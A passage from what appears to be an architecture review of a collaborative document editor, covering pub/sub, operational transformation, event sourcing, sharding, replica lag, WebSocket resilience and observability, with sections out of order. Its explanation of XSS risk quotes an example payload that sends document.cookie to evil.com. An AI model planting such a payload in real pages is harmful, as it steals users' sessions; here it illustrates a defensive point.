// Flush buffered operations every 100ms
this.flushInterval = setInterval(() => this.flushBuffers(), 100);
}
async applyOperation(op: DocumentOperation): Promise<void> {
// Layer 1: Immediate - Redis for real-time sync
await this.redis.multi()
.xadd(
`doc:${op.documentId}:ops`,
'MAXLEN', '~', '1000',
'*',
'data', JSON.stringify(op)
)
.publish(`doc:${op.documentId}`, JSON.stringify(op))
.exec();
// Layer 2: Buffered - Batch writes to PostgreSQL
if (!this.operationBuffer.has(op.documentId)) {
this.operationBuffer.set(op.documentId, []);
}
this.operationBuffer.get(op.documentId)!.push(op);
}
private async flushBuffers(): Promise<void> {
const buffers = new Map(this.operationBuffer);
this.operationBuffer.clear();
for (const [documentId, operations] of buffers) {
if (operations.length === 0) continue;
try {
await this.batchInsertOperations(operations);
} catch (error) {
// Re-queue failed operations
const existing = this.operationBuffer.get(documentId) ?? [];
this.operationBuffer.set(documentId, [...operations, ...existing]);
console.error(`Failed to flush operations for ${documentId}:`, error);
}
}
}
private async batchInsertOperations(operations: DocumentOperation[]): Promise<void> {
const values = operations.map((op, i) => {
const offset = i * 7;
return `($${offset + 1}, $${offset + 2}, $${offset + 3}, $${offset + 4}, $${offset + 5}, $${offset + 6}, $${offset + 7})`;
}).join(', ');
const params = operations.flatMap(op => [
op.id, op.documentId, op.userId, op.revision,
JSON.stringify(op.operation), JSON.stringify(op.timestamp), op.checksum
]);
await this.pool.query(`
INSERT INTO document_operations
(id, document_id, user_id, revision, operation, timestamp, checksum)
VALUES ${values}
ON CONFLICT (document_id, revision) DO NOTHING
`, params);
}
// Recovery: Rebuild from PostgreSQL if Redis data is lost
async recoverFromPostgres(documentId: string, fromRevision: number): Promise<DocumentOperation[]> {
const { rows } = await this.pool.query(`
SELECT * FROM document_operations
WHERE document_id = $1 AND revision > $2
ORDER BY revision ASC
`, [documentId, fromRevision]);
return rows.map(row => ({
id: row.id,
documentId: row.document_id,
userId: row.user_id,
revision: row.revision,
operation: row.operation, // JSONB columns come back from pg already parsed
timestamp: row.timestamp,
checksum: row.checksum
}));
}
}
The Problem: Large organizations (e.g., enterprise customers) create hot partitions:
Organization A (10 users): Partition 1 - light load
Organization B (10,000 users): Partition 2 - overwhelmed
Organization C (50 users): Partition 3 - light load
Solution: Document-Level Sharding with Consistent Hashing
class DocumentShardRouter {
private shards: ShardInfo[];
private hashRing: ConsistentHashRing;
constructor(shards: ShardInfo[]) {
this.shards = shards;
this.hashRing = new ConsistentHashRing(
shards.map(s => s.id),
100 // Virtual nodes per shard
);
}
getShardForDocument(documentId: string): ShardInfo {
const shardId = this.hashRing.getNode(documentId);
return this.shards.find(s => s.id === shardId)!;
}
// Rebalance when adding/removing shards
async addShard(newShard: ShardInfo): Promise<void> {
this.shards.push(newShard);
this.hashRing.addNode(newShard.id);
// Migrate affected documents
await this.migrateDocuments(newShard);
}
private async migrateDocuments(targetShard: ShardInfo): Promise<void> {
// Find documents that should now be on the new shard
for (const shard of this.shards) {
if (shard.id === targetShard.id) continue;
const documents = await this.getDocumentsOnShard(shard);
for (const doc of documents) {
const correctShard = this.getShardForDocument(doc.id);
if (correctShard.id === targetShard.id) {
await this.migrateDocument(doc.id, shard, targetShard);
}
}
}
}
}
// Shard-aware connection pool
class ShardedConnectionPool {
private pools: Map<string, Pool> = new Map();
private router: DocumentShardRouter;
async query(documentId: string, sql: string, params: any[]): Promise<QueryResult> {
const shard = this.router.getShardForDocument(documentId);
const pool = this.pools.get(shard.id);
if (!pool) {
throw new Error(`No pool for shard ${shard.id}`);
}
return pool.query(sql, params);
}
// Cross-shard queries (avoid when possible)
async queryAll(sql: string, params: any[]): Promise<QueryResult[]> {
const results = await Promise.all(
Array.from(this.pools.values()).map(pool => pool.query(sql, params))
);
return results;
}
}
Alternative: Vitess or Citus for Automatic Sharding
-- Citus distributed table
SELECT create_distributed_table('document_operations', 'document_id');
SELECT create_distributed_table('documents', 'id');
-- Queries automatically route to correct shard
SELECT * FROM documents WHERE id = 'doc-123'; -- Routes to one shard
SELECT * FROM documents WHERE organization_id = 'org-456'; -- Fan-out query
The Problem: Read replicas can be seconds behind the primary, causing users to see stale data:
10:00:00.000 - Alice saves document (writes to primary)
10:00:00.500 - Alice refreshes page (reads from replica)
Replica is 1 second behind - Alice sees old version!
"Where did my changes go?!"
Solution: Read-Your-Writes Consistency
class ConsistentReadService {
private primaryPool: Pool;
private replicaPool: Pool;
private redis: Redis;
async read(
userId: string,
documentId: string,
query: string,
params: any[]
): Promise<QueryResult> {
// Check if user recently wrote to this document
const lastWriteTime = await this.redis.get(`write:${userId}:${documentId}`);
if (lastWriteTime) {
const timeSinceWrite = Date.now() - parseInt(lastWriteTime);
// If write was recent, check replica lag
if (timeSinceWrite < 10000) { // Within 10 seconds
const replicaLag = await this.getReplicaLag();
if (replicaLag * 1000 > timeSinceWrite) {
// Replica hasn't caught up - read from primary
return this.primaryPool.query(query, params);
}
}
}
// Safe to read from replica
return this.replicaPool.query(query, params);
}
async write(
userId: string,
documentId: string,
query: string,
params: any[]
): Promise<QueryResult> {
const result = await this.primaryPool.query(query, params);
// Track write time for read-your-writes consistency
await this.redis.setex(
`write:${userId}:${documentId}`,
60, // Track for 60 seconds
Date.now().toString()
);
return result;
}
private async getReplicaLag(): Promise<number> {
const { rows } = await this.replicaPool.query(`
SELECT EXTRACT(EPOCH FROM (NOW() - pg_last_xact_replay_timestamp())) AS lag
`);
return rows[0]?.lag ?? 0;
}
}
// Alternative: LSN-based consistency
class LSNConsistentReadService {
async write(userId: string, query: string, params: any[]): Promise<{ result: QueryResult; lsn: string }> {
const result = await this.primaryPool.query(query, params);
// Get current WAL position
const { rows } = await this.primaryPool.query('SELECT pg_current_wal_lsn()::text AS lsn');
const lsn = rows[0].lsn;
// Store LSN for user's session
await this.redis.setex(`session:${userId}:lsn`, 300, lsn);
return { result, lsn };
}
async read(userId: string, query: string, params: any[]): Promise<QueryResult> {
const requiredLsn = await this.redis.get(`session:${userId}:lsn`);
if (requiredLsn) {
try {
// Wait for replica to catch up (with timeout)
await this.waitForReplicaLsn(requiredLsn, 5000);
} catch {
// Replica didn't catch up within the timeout - serve from the primary
return this.primaryPool.query(query, params);
}
}
return this.replicaPool.query(query, params);
}
private async waitForReplicaLsn(targetLsn: string, timeoutMs: number): Promise<void> {
const start = Date.now();
while (Date.now() - start < timeoutMs) {
const { rows } = await this.replicaPool.query(`
SELECT pg_last_wal_replay_lsn() >= $1::pg_lsn AS caught_up
`, [targetLsn]);
if (rows[0].caught_up) return;
await new Promise(resolve => setTimeout(resolve, 50));
}
// Timeout - throw so the caller can fall back to the primary
throw new Error('Replica lag timeout');
}
}
The Problem: WebSocket connections drop frequently (network changes, mobile sleep, etc.). Without proper reconnection, users lose real-time updates.
Solution: Robust Reconnection with Exponential Backoff
class ResilientWebSocket {
protected ws: WebSocket | null = null;
private url: string;
private reconnectAttempts = 0;
private maxReconnectAttempts = 10;
private baseDelay = 1000;
private maxDelay = 30000;
private messageQueue: string[] = [];
private lastEventId: string | null = null;
constructor(url: string) {
this.url = url;
this.connect();
}
private connect(): void {
// Include last event ID for resumption
const connectUrl = this.lastEventId
? `${this.url}?lastEventId=${this.lastEventId}`
: this.url;
this.ws = new WebSocket(connectUrl);
this.ws.onopen = () => this.onOpen();
this.ws.onclose = (event) => {
this.onClose();
if (event.code !== 1000) { // Not a clean close
this.scheduleReconnect();
}
};
this.ws.onerror = (error) => {
console.error('WebSocket error:', error);
};
this.ws.onmessage = (event) => {
const data = JSON.parse(event.data);
if (data.eventId) {
this.lastEventId = data.eventId;
}
this.handleMessage(data);
};
}
// Overridable lifecycle hooks (HeartbeatWebSocket below builds on these)
protected onOpen(): void {
console.log('WebSocket connected');
this.reconnectAttempts = 0;
this.flushMessageQueue();
}
protected onClose(): void {}
private scheduleReconnect(): void {
if (this.reconnectAttempts >= this.maxReconnectAttempts) {
console.error('Max reconnection attempts reached');
this.onMaxRetriesExceeded?.();
return;
}
const delay = Math.min(
this.baseDelay * Math.pow(2, this.reconnectAttempts) + Math.random() * 1000,
this.maxDelay
);
console.log(`Reconnecting in ${delay}ms (attempt ${this.reconnectAttempts + 1})`);
setTimeout(() => {
this.reconnectAttempts++;
this.connect();
}, delay);
}
send(message: string): void {
if (this.ws?.readyState === WebSocket.OPEN) {
this.ws.send(message);
} else {
// Queue message for when connection is restored
this.messageQueue.push(message);
}
}
private flushMessageQueue(): void {
while (this.messageQueue.length > 0 && this.ws?.readyState === WebSocket.OPEN) {
const message = this.messageQueue.shift()!;
this.ws.send(message);
}
}
// Callbacks
onMessage?: (data: any) => void;
onMaxRetriesExceeded?: () => void;
protected handleMessage(data: any): void {
this.onMessage?.(data);
}
}
Server-Side: Event Resumption
class WebSocketServer {
private redis: Redis;
async handleConnection(ws: WebSocket, req: Request): Promise<void> {
const documentId = req.query.documentId as string;
const lastEventId = req.query.lastEventId as string | undefined;
// Send missed events if client is resuming
if (lastEventId) {
const missedEvents = await this.getMissedEvents(documentId, lastEventId);
for (const event of missedEvents) {
ws.send(JSON.stringify(event));
}
}
// Subscribe to new events
this.subscribeToDocument(documentId, ws);
}
private async getMissedEvents(documentId: string, lastEventId: string): Promise<any[]> {
// Use Redis Streams for event sourcing
const events = await this.redis.xrange(
`doc:${documentId}:events`,
lastEventId,
'+',
'COUNT', 1000
);
return events
.filter(([id]) => id !== lastEventId) // Exclude the last seen event
.map(([id, fields]) => ({
eventId: id,
...this.parseStreamFields(fields)
}));
}
}
The Problem: Silent connection failures (NAT timeout, proxy disconnect) aren't detected, leaving "zombie" connections.
Solution: Bidirectional Heartbeat
// Client-side
class HeartbeatWebSocket extends ResilientWebSocket {
private heartbeatInterval: NodeJS.Timeout | null = null;
private heartbeatTimeout: NodeJS.Timeout | null = null;
private readonly HEARTBEAT_INTERVAL = 30000; // 30 seconds
private readonly HEARTBEAT_TIMEOUT = 10000; // 10 seconds to respond
protected onOpen(): void {
super.onOpen();
this.startHeartbeat();
}
protected onClose(): void {
this.stopHeartbeat();
super.onClose();
}
private startHeartbeat(): void {
this.heartbeatInterval = setInterval(() => {
if (this.ws?.readyState === WebSocket.OPEN) {
this.ws.send(JSON.stringify({ type: 'ping', timestamp: Date.now() }));
this.heartbeatTimeout = setTimeout(() => {
console.log('Heartbeat timeout - closing connection');
this.ws?.close();
}, this.HEARTBEAT_TIMEOUT);
}
}, this.HEARTBEAT_INTERVAL);
}
private stopHeartbeat(): void {
if (this.heartbeatInterval) clearInterval(this.heartbeatInterval);
if (this.heartbeatTimeout) clearTimeout(this.heartbeatTimeout);
}
protected handleMessage(data: any): void {
if (data.type === 'pong') {
if (this.heartbeatTimeout) clearTimeout(this.heartbeatTimeout);
return;
}
super.handleMessage(data);
}
}
// Server-side
class WebSocketServerWithHeartbeat {
private readonly CLIENT_TIMEOUT = 60000; // 60 seconds without activity
handleConnection(ws: WebSocket): void {
let lastActivity = Date.now();
const checkTimeout = setInterval(() => {
if (Date.now() - lastActivity > this.CLIENT_TIMEOUT) {
console.log('Client timeout - closing connection');
ws.close(4000, 'Timeout');
clearInterval(checkTimeout);
}
}, 10000);
ws.on('message', (message) => {
lastActivity = Date.now();
const data = JSON.parse(message.toString());
if (data.type === 'ping') {
ws.send(JSON.stringify({ type: 'pong', timestamp: Date.now() }));
return;
}
this.handleMessage(ws, data);
});
ws.on('close', () => {
clearInterval(checkTimeout);
});
}
}
The Problem: When components fail, the entire system becomes unusable instead of degrading gracefully.
Solution: Circuit Breakers and Fallbacks
import CircuitBreaker from 'opossum';
class ResilientDocumentService {
private dbBreaker: CircuitBreaker;
private redisBreaker: CircuitBreaker;
private localCache: LRUCache<string, Document>;
constructor() {
// Database circuit breaker
this.dbBreaker = new CircuitBreaker(this.queryDatabase.bind(this), {
timeout: 3000, // 3 second timeout
errorThresholdPercentage: 50, // Open after 50% failures
resetTimeout: 30000, // Try again after 30 seconds
volumeThreshold: 10 // Minimum requests before opening
});
this.dbBreaker.fallback(async (documentId: string) => {
// Try Redis cache
return this.getFromRedis(documentId);
});
this.dbBreaker.on('open', () => {
console.error('Database circuit breaker opened');
this.alertOps('Database circuit breaker opened');
});
// Redis circuit breaker
this.redisBreaker = new CircuitBreaker(this.queryRedis.bind(this), {
timeout: 1000,
errorThresholdPercentage: 50,
resetTimeout: 10000
});
this.redisBreaker.fallback(async (key: string) => {
// Fall back to local cache
return this.localCache.get(key);
});
}
async getDocument(documentId: string): Promise<Document | null> {
try {
// Try local cache first
const cached = this.localCache.get(documentId);
if (cached) return cached;
// Try Redis (through circuit breaker)
const redisDoc = await this.redisBreaker.fire(documentId);
if (redisDoc) {
this.localCache.set(documentId, redisDoc);
return redisDoc;
}
// Try database (through circuit breaker)
const dbDoc = await this.dbBreaker.fire(documentId);
if (dbDoc) {
this.localCache.set(documentId, dbDoc);
await this.cacheInRedis(documentId, dbDoc);
return dbDoc;
}
return null;
} catch (error) {
console.error('All fallbacks failed:', error);
throw new ServiceUnavailableError('Document service temporarily unavailable');
}
}
// Degraded mode: Allow viewing but not editing
async saveOperation(op: DocumentOperation): Promise<SaveResult> {
try {
await this.dbBreaker.fire(op);
return { success: true };
} catch (error) {
if (this.dbBreaker.opened) {
// Queue operation for later processing
await this.queueForRetry(op);
return {
success: false,
queued: true,
message: 'Your changes are saved locally and will sync when service is restored'
};
}
throw error;
}
}
}
The Problem: Without proper observability, you can't diagnose issues or understand system behavior.
Solution: Comprehensive Observability Stack
import { metrics, trace, context } from '@opentelemetry/api';
import { PrometheusExporter } from '@opentelemetry/exporter-prometheus';
class DocumentMetrics {
private meter = metrics.getMeter('document-service');
private tracer = trace.getTracer('document-service');
// Counters
private operationsTotal = this.meter.createCounter('document_operations_total', {
description: 'Total number of document operations'
});
private conflictsTotal = this.meter.createCounter('document_conflicts_total', {
description: 'Total number of operation conflicts'
});
// Histograms
private operationLatency = this.meter.createHistogram('document_operation_latency_ms', {
description: 'Latency of document operations in milliseconds'
});
private syncLatency = this.meter.createHistogram('document_sync_latency_ms', {
description: 'Time from operation submission to all clients receiving it'
});
// Gauges
private activeConnections = this.meter.createObservableGauge('websocket_connections_active', {
description: 'Number of active WebSocket connections'
});
// Histogram (document size distribution, not a gauge)
private documentSize = this.meter.createHistogram('document_size_bytes', {
description: 'Size of documents in bytes'
});
// Instrument an operation
async trackOperation<T>(
operationType: string,
documentId: string,
fn: () => Promise<T>
): Promise<T> {
const span = this.tracer.startSpan(`document.${operationType}`, {
attributes: {
'document.id': documentId,
'operation.type': operationType
}
});
const startTime = Date.now();
try {
const result = await context.with(trace.setSpan(context.active(), span), fn);
this.operationsTotal.add(1, {
operation: operationType,
status: 'success'
});
return result;
} catch (error) {
span.recordException(error as Error);
this.operationsTotal.add(1, {
operation: operationType,
status: 'error',
error_type: (error as Error).name
});
throw error;
} finally {
const duration = Date.now() - startTime;
this.operationLatency.record(duration, {
operation: operationType
});
span.end();
}
}
recordConflict(documentId: string, conflictType: string): void {
this.conflictsTotal.add(1, {
document_id: documentId,
conflict_type: conflictType
});
}
recordSyncLatency(latencyMs: number): void {
this.syncLatency.record(latencyMs);
}
}
// Structured logging
import pino from 'pino';
const logger = pino({
level: process.env.LOG_LEVEL || 'info',
formatters: {
level: (label) => ({ level: label })
},
base: {
service: 'document-service',
version: process.env.APP_VERSION
}
});
// Usage
class DocumentService {
private metrics = new DocumentMetrics();
private logger = logger.child({ component: 'DocumentService' });
async applyOperation(op: DocumentOperation): Promise<void> {
return this.metrics.trackOperation('apply', op.documentId, async () => {
this.logger.info({
event: 'operation_received',
documentId: op.documentId,
userId: op.userId,
revision: op.revision
});
// ... apply operation
this.logger.info({
event: 'operation_applied',
documentId: op.documentId,
newRevision: op.revision
});
});
}
}
| Issue | Severity | Effort | Priority |
|---|---|---|---|
| Client clock timestamps | 🔴 Critical | Medium | P0 |
| Paragraph-level LWW | 🔴 Critical | High | P0 |
| Cross-server WebSocket isolation | 🔴 Critical | Medium | P0 |
| 30-second snapshot data loss | 🔴 Critical | Medium | P0 |
| JWT in localStorage | 🟠 High | Low | P1 |
| CDN caching API responses | 🟠 High | Low | P1 |
| Missing document authorization | 🟠 High | Medium | P1 |
| PostgreSQL as message bus | 🟠 High | High | P1 |
| No WebSocket reconnection | 🟡 Medium | Low | P2 |
| No heartbeat/keep-alive | 🟡 Medium | Low | P2 |
| Read replica lag | 🟡 Medium | Medium | P2 |
| Organization-based sharding | 🟡 Medium | High | P2 |
| HTML storage (XSS) | 🟡 Medium | Medium | P2 |
| Missing observability | 🟡 Medium | Medium | P2 |
| No circuit breakers | 🟢 Low | Medium | P3 |
┌─────────────────────────────────────────────────────────────────────────────┐
│ Load Balancer │
│ (Sticky sessions by document ID) │
└─────────────────────────────────────────────────────────────────────────────┘
│
┌─────────────────┼─────────────────┐
▼ ▼ ▼
┌──────────────┐ ┌──────────────┐ ┌──────────────┐
│ API Server │ │ API Server │ │ API Server │
│ + WebSocket │ │ + WebSocket │ │ + WebSocket │
│ + OT Engine │ │ + OT Engine │ │ + OT Engine │
└──────────────┘ └──────────────┘ └──────────────┘
│ │ │
└─────────────────┼─────────────────┘
│
┌─────────────────┼─────────────────┐
▼ ▼ ▼
┌──────────────┐ ┌──────────────┐ ┌──────────────┐
│ Redis │ │ Redis │ │ Redis │
│ (Primary) │ │ (Replica) │ │ (Replica) │
│ - Pub/Sub │ │ │ │ │
│ - Op Cache │ │ │ │ │
│ - Sessions │ │ │ │ │
└──────────────┘ └──────────────┘ └──────────────┘
│
┌─────────────────┼─────────────────┐
▼ ▼ ▼
┌──────────────┐ ┌──────────────┐ ┌──────────────┐
│ PostgreSQL │ │ PostgreSQL │ │ PostgreSQL │
│ (Primary) │ │ (Replica) │ │ (Replica) │
│ - Documents │ │ (Read-only) │ │ (Read-only) │
│ - Operations│ │ │ │ │
│ - Snapshots │ │ │ │ │
└──────────────┘ └──────────────┘ └──────────────┘
This revised architecture addresses the critical issues identified above while preserving horizontal scalability and reliability.
This architecture has several critical flaws that would cause data loss, inconsistency, and poor user experience at scale. I'll work through every layer systematically.
The Flaw: Each API server only broadcasts changes to its own WebSocket clients. Other servers discover changes by polling PostgreSQL every 2 seconds.
Timeline showing the problem:
Server A (Alice connected) Server B (Bob connected)
───────────────────────────────── ─────────────────────────────────
t=0.0s Alice types "Hello"
t=0.0s Broadcast to Server A
clients ✓
t=0.0s Write to PostgreSQL
t=0.1s Bob types "World"
t=0.1s Broadcast to Server B
clients ✓
t=0.1s Write to PostgreSQL
... silence ... ... silence ...
t=2.0s t=2.0s Poll PostgreSQL
Poll PostgreSQL → discovers "Hello"
→ discovers "World" → broadcasts to Bob
→ broadcasts to Alice
Result: 2-SECOND LATENCY for cross-server collaboration.
That's completely unacceptable for real-time editing.
The Solution: Dedicated pub/sub layer for inter-server communication.
┌──────────┐ WebSocket ┌────────────┐
│ Alice │◄──────────────────►│ Server A │
└──────────┘ └─────┬──────┘
│ PUBLISH "doc:123"
▼
┌────────────┐
│ Redis │
│ Pub/Sub │
└─────┬──────┘
│ SUBSCRIBE "doc:123"
▼
┌──────────┐ WebSocket ┌────────────┐
│ Bob │◄──────────────────►│ Server B │
└──────────┘ └────────────┘
// Server-side: publish changes to all servers via Redis Pub/Sub
const Redis = require('ioredis');
const pub = new Redis(REDIS_URL);
const sub = new Redis(REDIS_URL);
// When a change arrives via WebSocket from a client
async function handleClientChange(change, documentId, serverId) {
// 1. Persist to database
await persistChange(change);
// 2. Broadcast to local WebSocket clients (immediate, <10ms)
broadcastToLocalClients(documentId, change);
// 3. Publish to Redis so OTHER servers get it immediately
await pub.publish(`doc:${documentId}`, JSON.stringify({
change,
originServer: serverId, // so we can avoid echo
timestamp: Date.now()
}));
}
// Every server subscribes to channels for documents with active editors
sub.on('message', (channel, message) => {
const { change, originServer } = JSON.parse(message);
// Don't re-broadcast changes that originated from this server
if (originServer === MY_SERVER_ID) return;
const documentId = channel.replace('doc:', '');
broadcastToLocalClients(documentId, change);
});
// Subscribe when a client opens a document
function onClientOpensDocument(documentId) {
sub.subscribe(`doc:${documentId}`);
}
Trade-offs:
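One gap in the pub/sub sketch above: `sub.subscribe` is called when a client opens a document, but nothing ever unsubscribes. A reference-counted wrapper (an assumed helper, not part of the original design) keeps each server subscribed only to channels that still have local clients:

```javascript
// Assumed helper: reference-counted channel subscriptions. Without it,
// every server gradually subscribes to every document channel it has
// ever served, and Pub/Sub fan-out degrades.
class DocumentSubscriptions {
  constructor(sub) {
    this.sub = sub;             // an ioredis subscriber connection (or a stub)
    this.refCounts = new Map(); // documentId -> number of local clients
  }

  clientOpened(documentId) {
    const count = (this.refCounts.get(documentId) || 0) + 1;
    this.refCounts.set(documentId, count);
    if (count === 1) this.sub.subscribe(`doc:${documentId}`); // first local client
  }

  clientClosed(documentId) {
    const count = (this.refCounts.get(documentId) || 0) - 1;
    if (count <= 0) {
      this.refCounts.delete(documentId);
      this.sub.unsubscribe(`doc:${documentId}`); // last local client left
    } else {
      this.refCounts.set(documentId, count);
    }
  }
}
```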
The Flaw: This is the most damaging design choice in the entire architecture. With last-write-wins at the paragraph level, concurrent edits cause silent data loss.
Scenario: Alice and Bob both edit the same paragraph simultaneously.
Original paragraph: "The quick brown fox"
Alice (t=100): "The quick brown fox jumps over the lazy dog"
(added " jumps over the lazy dog")
Bob (t=101): "The slow brown fox"
(changed "quick" to "slow")
Last-write-wins result: "The slow brown fox"
Alice's addition is SILENTLY DELETED. No warning. No merge. Just gone.
The Solution: Operational Transformation (OT) or CRDTs.
For a Google Docs-style editor, OT is the proven approach. Here's the conceptual implementation:
// Each change is expressed as an operation, not a state snapshot
// Operations are: retain(n), insert(text), delete(n)
// Alice's operation on "The quick brown fox" (length 19):
const aliceOp = [
retain(19), // keep everything
insert(" jumps over the lazy dog") // append
];
// Bob's operation on "The quick brown fox" (length 19):
const bobOp = [
retain(4), // keep "The "
delete(5), // remove "quick"
insert("slow"), // insert "slow"
retain(10) // keep " brown fox"
];
// The OT transform function computes compatible operations
const [alicePrime, bobPrime] = transform(aliceOp, bobOp);
// Applying both transformed operations yields:
// "The slow brown fox jumps over the lazy dog"
// BOTH edits are preserved!
// Server-side OT engine
class DocumentOTEngine {
constructor(documentId) {
this.documentId = documentId;
this.revision = 0; // monotonically increasing server revision
this.operationLog = []; // ordered list of all operations
}
/**
* Client sends: { revision: clientRev, operation: op }
* clientRev = the server revision the client's op was based on
*/
async receiveOperation(clientRevision, operation, userId) {
// Transform against all operations that happened since
// the client's known revision
let transformedOp = operation;
for (let i = clientRevision; i < this.revision; i++) {
const serverOp = this.operationLog[i];
// Transform client op against each concurrent server op
[transformedOp] = transform(transformedOp, serverOp);
}
// Apply the transformed operation to the server document
this.document = apply(this.document, transformedOp);
this.operationLog.push(transformedOp);
this.revision++;
// Persist and broadcast
await this.persist(transformedOp);
this.broadcast(transformedOp, userId);
// Send acknowledgment to the original client
return { revision: this.revision };
}
}
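The `transform` function above is used abstractly. To make the convergence property concrete, here is a deliberately minimal sketch for one narrow case, two concurrent inserts represented as `{ pos, text }` (an assumed toy representation; real OT libraries handle the full retain/insert/delete algebra):

```javascript
// Minimal transform for two concurrent inserts { pos, text } (toy
// representation; real OT transforms full operation sequences).
function transformInsertInsert(a, b) {
  // If b inserted at or before a's position, a must shift right.
  // Ties go to b so both sides converge on the same final order.
  const aPrime = b.pos <= a.pos
    ? { pos: a.pos + b.text.length, text: a.text }
    : { ...a };
  const bPrime = a.pos < b.pos
    ? { pos: b.pos + a.text.length, text: b.text }
    : { ...b };
  return [aPrime, bPrime];
}

function applyInsert(doc, op) {
  return doc.slice(0, op.pos) + op.text + doc.slice(op.pos);
}

// Convergence check: (a then b') and (b then a') yield the same document.
const base = "The quick brown fox";
const a = { pos: 19, text: " jumps" }; // Alice appends at the end
const b = { pos: 4, text: "very " };   // Bob inserts near the front
const [aPrime, bPrime] = transformInsertInsert(a, b);
const left = applyInsert(applyInsert(base, a), bPrime);
const right = applyInsert(applyInsert(base, b), aPrime);
// left === right === "The very quick brown fox jumps"
```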
Trade-offs:
OT transform functions are subtle to implement correctly; a battle-tested library (e.g., ot.js or ShareDB) is strongly preferable to a hand-rolled engine.

The Flaw: Conflict resolution relies on client-side timestamps. Client clocks are arbitrary.
Alice's laptop clock: 2024-01-15 14:00:00 (correct)
Bob's laptop clock: 2024-01-15 09:00:00 (5 hours behind)
Bob's edits will ALWAYS lose to Alice's, even if Bob edited later.
Worse: a malicious user could set their clock to year 2030
and their edits would always win.
The Solution: Use server-assigned logical ordering.
// Every operation gets a server-side revision number
// This is the OT approach from 1.2, but even without OT:
class DocumentRevisionManager {
// Use a PostgreSQL sequence or Redis INCR for atomic ordering
async assignRevision(documentId, operation) {
// INCR is atomic in Redis — no two operations get the same number
const revision = await redis.incr(`doc:${documentId}:revision`);
return {
...operation,
revision, // server-assigned order
serverTimestamp: Date.now(), // server clock, not client
// client timestamp kept only for analytics, never for ordering
clientTimestamp: operation.clientTimestamp
};
}
}
Trade-offs:
The Flaw: Documents are saved as full HTML snapshots every 30 seconds. If a server crashes, up to 30 seconds of all active users' work is lost.
t=0s Snapshot saved
t=5s Alice types a paragraph
t=15s Bob adds a table
t=25s Carol writes three paragraphs
t=29s SERVER CRASHES
─────────────────
All work from t=0s to t=29s is GONE.
Three users just lost their work simultaneously.
The Solution: Event-sourced operation log with periodic snapshots for fast loading.
// Every individual operation is persisted immediately
// Snapshots are just an optimization for fast document loading
// PostgreSQL schema
const schema = `
-- The operation log is the source of truth
CREATE TABLE document_operations (
id BIGSERIAL PRIMARY KEY,
document_id UUID NOT NULL,
revision INTEGER NOT NULL,
operation JSONB NOT NULL, -- the OT operation
user_id UUID NOT NULL,
created_at TIMESTAMPTZ DEFAULT NOW(),
UNIQUE(document_id, revision) -- enforces operation ordering
);
-- Snapshots are a materialized optimization, not the source of truth
CREATE TABLE document_snapshots (
document_id UUID NOT NULL,
revision INTEGER NOT NULL, -- snapshot is valid AT this revision
content JSONB NOT NULL, -- full document state
created_at TIMESTAMPTZ DEFAULT NOW(),
PRIMARY KEY(document_id, revision)
);
-- Index for fast "give me ops since revision X" queries
CREATE INDEX idx_ops_doc_revision
ON document_operations(document_id, revision);
`;
// Loading a document: snapshot + replay
async function loadDocument(documentId) {
// 1. Get the latest snapshot (fall back to an empty document if none;
// emptyDocument() is an assumed helper returning the schema's empty doc)
const snapResult = await db.query(`
SELECT content, revision FROM document_snapshots
WHERE document_id = $1
ORDER BY revision DESC LIMIT 1
`, [documentId]);
const snapshot = snapResult.rows[0] || { content: emptyDocument(), revision: 0 };
// 2. Get all operations AFTER the snapshot
const opsResult = await db.query(`
SELECT operation FROM document_operations
WHERE document_id = $1 AND revision > $2
ORDER BY revision ASC
`, [documentId, snapshot.revision]);
// 3. Replay operations on top of the snapshot
let document = snapshot.content;
for (const row of opsResult.rows) {
document = applyOperation(document, row.operation);
}
return { document, revision: snapshot.revision + opsResult.rows.length };
}
// Background job: create snapshots periodically to bound replay cost
async function createSnapshot(documentId) {
const { document, revision } = await loadDocument(documentId);
await db.query(`
INSERT INTO document_snapshots (document_id, revision, content)
VALUES ($1, $2, $3)
ON CONFLICT DO NOTHING
`, [documentId, revision, document]);
}
Trade-offs:
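The background snapshot job above needs a trigger policy, which the design leaves open. One common choice (a sketch with an assumed threshold) is to snapshot by replay cost rather than on a timer, so hot documents snapshot often and idle ones never do:

```javascript
// Assumed policy: snapshot once replaying since the last snapshot would
// exceed a fixed number of operations. The threshold is a starting guess
// to tune against measured replay latency.
const SNAPSHOT_EVERY_N_OPS = 200;

function shouldSnapshot(currentRevision, lastSnapshotRevision) {
  return currentRevision - lastSnapshotRevision >= SNAPSHOT_EVERY_N_OPS;
}

// After persisting an operation, the server checks this and, when it fires,
// kicks off createSnapshot(documentId) in the background; duplicate
// snapshots are harmless thanks to ON CONFLICT DO NOTHING.
```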
The Flaw: Storing documents as "full HTML snapshots" creates multiple problems:
Problems with raw HTML storage:
1. XSS VULNERABILITY:
User pastes: <img src=x onerror="fetch('evil.com/steal?cookie='+document.cookie)">
If stored as raw HTML and rendered, every viewer gets compromised.
2. BLOAT:
A 1-page document in HTML: ~50KB
Same content in structured JSON: ~5KB
With 30-second snapshots × millions of documents = massive storage
3. NO STRUCTURED OPERATIONS:
You can't diff two HTML snapshots to figure out what changed.
You can't do OT on raw HTML.
You can't build features like "show me what Bob changed."
The Solution: Use a structured document model (like ProseMirror/Tiptap's JSON schema).
// Instead of: "<h1>Title</h1><p>Hello <strong>world</strong></p>"
// Store:
const documentStructure = {
type: "doc",
content: [
{
type: "heading",
attrs: { level: 1 },
content: [{ type: "text", text: "Title" }]
},
{
type: "paragraph",
content: [
{ type: "text", text: "Hello " },
{ type: "text", text: "world", marks: [{ type: "bold" }] }
]
}
]
};
// This structured format:
// ✓ Can be validated against a schema (no XSS)
// ✓ Can be diffed structurally
// ✓ Can have OT operations applied to it
// ✓ Is ~60-80% smaller than equivalent HTML
// ✓ Can be rendered to HTML, Markdown, PDF, etc.
// Sanitization on output (defense in depth)
function renderToHTML(doc) {
// Even with structured storage, sanitize on render
return sanitizeHtml(structuredToHtml(doc), {
allowedTags: ['h1','h2','h3','p','strong','em','a','ul','ol','li','table'],
allowedAttributes: { 'a': ['href'] }
});
}
The Flaw: Every keystroke from every user results in a write to PostgreSQL. PostgreSQL is excellent, but it's not designed for the write pattern of "millions of tiny inserts per second with immediate consistency requirements."
Back-of-napkin math:
- 100,000 concurrent users
- Average 3 operations/second per user (typing)
- = 300,000 writes/second to PostgreSQL
- Each write needs to be durable (fsync) for data safety
- PostgreSQL on good hardware: ~50,000-100,000 TPS
You're 3-6x over capacity.
The Solution: Multi-tier write strategy.
// Tier 1: Redis Streams for immediate durability + ordering (microseconds)
